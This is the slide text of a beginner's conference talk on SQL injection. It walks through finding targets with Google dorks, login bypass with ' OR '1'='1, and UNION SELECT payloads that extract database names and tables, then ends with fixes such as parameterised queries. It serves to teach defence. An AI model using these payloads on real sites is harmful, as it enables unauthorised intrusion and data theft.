Recomendados
Recomendados
Más contenido relacionado
Último
Último (20)
Destacado
Destacado (20)
SQL Injection for Beginner's: It's Hammertime
- 1. Dr. Brigitte Lewis It’s Hammertime: SQL Injection For Beginners @briglewis #CyberCon #W0m3nWh0HackM3lb0urn3 @deloitte #projectfreidman
- 2. 1
- 3. Candid footage of me on a Sunday morning
- 4. 3
- 5. 4
- 6. 5
- 7. SELECT
- 8. blind
- 10. 9 Dewey Decimal System Hashtags FML ?
- 11. What You’re Going to Learn • Checking for SQL Injection Vulnerabilities is quick and you can do it too! • How to execute a SQL Injection • How to fix SQL vulnerabilities
- 12. Why SQL Injection (SQLi?)
- 20. 19
- 21. 20
- 22. 21
- 28. 27 • SQL Injection is the act of querying or sending requests, otherwise known as questions, to a database. • Know Thy Database. Creating a Conversation with the Database
- 29. From the table called users, check that the username Jo@influencer4lyfe.com.au is there and that Jo's password which is Influencerlyfe2019! also matches the password Jo supplied. Speaking in Database Tongue
- 31. 30 SELECT * FROM Users WHERE user = Jo@influencer4lyfe.com.au and password = influencerlyfe2019! SQL Query 101
- 32. 31 7 Steps to SQLi Heaven
- 33. 32 1. Get the Database Language
- 34. 33 1.1 Identify the Database Language Error Based SQL Injection
- 35. SQLi Hunting in the Wilds of the Internet Google Dorks Query Format for advanced search in Google where-you-want-to search:keyword inurl: php?id= inurl – Get URL’s or website addresses
- 37. SQLi Hunting in the Wilds of the Internet
- 38. 37 Statement / Equation True or False 1 + 1= 2 True 2 +2 = 4 True 1=1 a=a True True Speaking in Truths
- 39. 38 ' OR ‘1’ = ‘1 The Classic SQL Injection (SQLi)
- 40. 39 1.2 Login without a username or password
- 41. 40 2. Get the Contents of the Database You’re Currently Talking To
- 43. 42 Database 101 ID Username Password Signature 1 admin adminpass g0t r00t? 2 adrian somepassword Zombie Films Rock! 3 john monkey ###### 4 jeremy password ###### 5 bryce password ###### 6 samurai samurai ###### 7 jim password ###### 8 bobby password ###### 9 simba password ###### ID Credit Card 1 543556770082 2 543599755432 3 543554332153 4 543555588882 5 543525252183 6 543576464648 7 5435111172934 8 543523232902 9 5435116373849
- 44. 3. Count the columns to speak to other tables in the database (using ORDER BY) %3d is the = sign in URL language
- 45. 3.1 Count the columns to speak to other tables in the database ‘ ORDER by 1# ‘ ORDER by 2# ‘ ORDER by 3# 3 Columns in the table
- 46. 45 4. Checking for the vulnerable column
- 47. 46 4. Checking for the vulnerable columns
- 48. 47 4.2 Checking for the vulnerable column
- 49. 48 5. Get the Database Version +union select 1,version(),3
- 50. 49 6. Get the Database Name +union select database(),2,3
- 51. 50 'UNION SELECT 1, group_concat(table_name) from information_schema.tables where table_schema=database()%23 7. Get all the other database names to talk to them too
- 52. 51 3. Count the columns to speak to other tables in the database 4. Check for the vulnerable column 5. Get the database version 6. Get the database name 7. Get all the other database names to talk to them too. 1. Get the database to tell you the language it speaks 7 Steps to SQLi Heaven 2. Get the contents of the database you’re currently talking to
- 55. 54 Fixing SQL Vulnerabilities 1. Never Trust the User - Validate all input on the user and server side
- 56. 2. Input sanitisation - Clean it up before it is sent to the database
- 57. 3. Parameterisation or pre-prepared statements.
- 60. Thank-you for listening! That was: It’s Hammertime: SQL Injection For Beginners #CyberCon #W0m3nWh0HackM3lb0urn3 @Deloitte Dr. Brigitte Lewis | @briglewis I am
Notas del editor
- https://www.youtube.com/watch?v=8gbqued-9VQ
- Table name and database name
- Source: https://jqueryform.github.io/posts/html5-form-features-6.html
- https://www.youtube.com/watch?v=q8WSdypJ4WA